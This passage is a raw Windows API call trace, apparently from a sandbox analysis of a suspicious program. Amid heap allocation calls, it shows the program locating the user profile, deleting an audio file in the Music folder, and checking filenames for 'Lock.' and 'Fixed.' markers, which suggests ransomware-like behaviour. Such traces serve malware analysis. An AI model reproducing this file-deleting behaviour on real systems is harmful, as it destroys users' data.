hHeap=0x25c0000) returned 1 [0252.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0252.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.707] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.708] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0252.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.708] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0252.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.709] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qjSu2Nf.wav", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qjSu2Nf.wav", lpFilePart=0x8bedfc*="qjSu2Nf.wav") returned 0x2f [0252.709] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qjSu2Nf.wav", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb4826d0, ftCreationTime.dwHighDateTime=0x1d4ce8a, ftLastAccessTime.dwLowDateTime=0x8ab44d10, ftLastAccessTime.dwHighDateTime=0x1d4c612, ftLastWriteTime.dwLowDateTime=0x8ab44d10, ftLastWriteTime.dwHighDateTime=0x1d4c612, nFileSizeHigh=0x0, nFileSizeLow=0xafeb, dwReserved0=0x1344, dwReserved1=0x4, cFileName="qjSu2Nf.wav", cAlternateFileName="")) returned 0xaa57a0 [0252.709] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qjSu2Nf.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qjsu2nf.wav")) returned 1 [0252.711] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb4826d0, ftCreationTime.dwHighDateTime=0x1d4ce8a, ftLastAccessTime.dwLowDateTime=0x8ab44d10, ftLastAccessTime.dwHighDateTime=0x1d4c612, ftLastWriteTime.dwLowDateTime=0x8ab44d10, ftLastWriteTime.dwHighDateTime=0x1d4c612, nFileSizeHigh=0x0, nFileSizeLow=0xafeb, dwReserved0=0x1344, dwReserved1=0x4, cFileName="qjSu2Nf.wav", cAlternateFileName="")) returned 0 [0252.711] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0252.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0252.711] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0252.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0252.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0252.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0252.712] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa808 [0252.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0252.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0252.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.712] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0252.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0252.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0252.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0252.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0252.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0252.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0252.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0252.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0252.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0252.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0252.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0252.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x60) returned 0x240da88 [0252.720] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qjSu2Nf.wav", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qjSu2Nf.wav", lpFilePart=0x8bf658*="qjSu2Nf.wav") returned 0x2f [0252.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0252.720] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qjSu2Nf.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qjsu2nf.wav")) returned 0xffffffff [0252.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0252.721] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0252.721] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.721] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0252.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0252.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0252.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0252.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0252.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rk60-o366.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k60-o366.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="60-o366.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0-o366.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-o366.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o366.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="366.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0252.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0252.726] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0252.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0252.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0252.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0252.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b3bc8 [0252.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0252.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rk60-o366.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k60-o366.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="60-o366.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0252.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0-o366.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0252.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-o366.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o366.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="366.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0252.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0252.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0252.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0252.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0252.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0252.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0252.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0252.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.728] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0252.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0252.728] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0252.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0252.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0252.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1828 [0252.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0252.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0252.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0252.729] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa808 [0252.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0252.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaac0 [0252.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.730] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0252.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0252.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0252.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0252.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 